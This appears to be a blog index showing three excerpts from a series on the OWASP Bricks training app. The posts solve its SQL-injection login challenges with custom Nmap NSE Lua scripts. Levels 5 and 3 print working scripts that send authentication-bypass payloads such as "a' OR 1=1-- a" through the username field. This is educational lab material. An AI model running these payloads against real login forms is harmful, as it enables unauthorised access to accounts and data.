Bricks Login 5

Challenge Information

OWASP Bricks Docker version: here

This is a series in which I write my own Nmap NSE script to solve each challenge. The task was actually set by masta ghimau during MCC 2023.

Challenge Solution

Login level 5 is a simple SQL injection with one twist: the application converts the submitted password into an MD5 hash before it reaches the query, so a payload in the password field is hashed away. We get around that by injecting through the username field instead.

```lua
local http = require "http"
local shortport = require "shortport"

portrule = shortport.http

action = function(host, port)
  local resp, final, query
  -- form fields posted to the level-5 login page
  local r = {}
  r['username'] = "a' OR 1=1-- a"   -- closes the quoted name, then comments out the rest
  r['passwd'] = "test"              -- hashed server-side, so it cannot carry the payload
  r['submit'] = "Submit"
  resp = http.post(host, port, "/login-5/index.php", nil, nil, r)
  if not resp or not resp.body then
    return nil
  end
  -- the alert box holds the login result; the "SQL Query" div echoes the executed statement
  final = string.match(resp.body, '<p>.*alert%-box.->(.-)<a.*</p>')
  query = string.match(resp.body, ".*SQL Query(.*)<a.*</div>")
  return {payload = r, SQLQuery = query, result = final}
end
```

This script is based on http-title.nse. ...

December 3, 2024 · 2 min · 244 words

Bricks Login 4

Challenge Information

OWASP Bricks Docker version: here

This is a series in which I write my own Nmap NSE script to solve each challenge. The task was actually set by masta ghimau during MCC 2023.

Challenge Solution

Login level 4 is a SQL injection where the values are wrapped in brackets and double quotes. Here is an example of the query the page echoes back:

SQL Query: SELECT * FROM users WHERE name=("a") and password=("a")

We can reuse the previous NSE script and change only the injected payload so that it closes the double quote and the bracket before the OR clause. ...

December 3, 2024 · 2 min · 256 words

Bricks Login 3

Challenge Information

OWASP Bricks Docker version: here

This is a series in which I write my own Nmap NSE script to solve each challenge. The task was actually set by masta ghimau during MCC 2023.

Challenge Solution

Login level 3 is a slightly harder SQL injection, as it adds brackets around the quoted values, so the payload has to close both the quote and the bracket. Here is an example of the query the page echoes back:

SQL Query: SELECT * FROM users WHERE name=('1') and password=('1') LIMIT 0,1

```lua
local http = require "http"
local shortport = require "shortport"

portrule = shortport.http

action = function(host, port)
  local resp, final, query
  -- form fields posted to the level-3 login page
  local r = {}
  r['username'] = "a') OR 1=1-- a"  -- closes the quote and the bracket, then comments out the rest
  r['passwd'] = "test"
  r['submit'] = "Submit"
  resp = http.post(host, port, "/login-3/index.php", nil, nil, r)
  if not resp or not resp.body then
    return nil
  end
  -- the alert box holds the login result; the "SQL Query" div echoes the executed statement
  final = string.match(resp.body, '<p>.*alert%-box.->(.-)<a.*</p>')
  query = string.match(resp.body, ".*SQL Query(.*)<a.*</div>")
  return {payload = r, SQLQuery = query, result = final}
end
```

This script is based on http-title.nse. ...

December 3, 2024 · 2 min · 249 words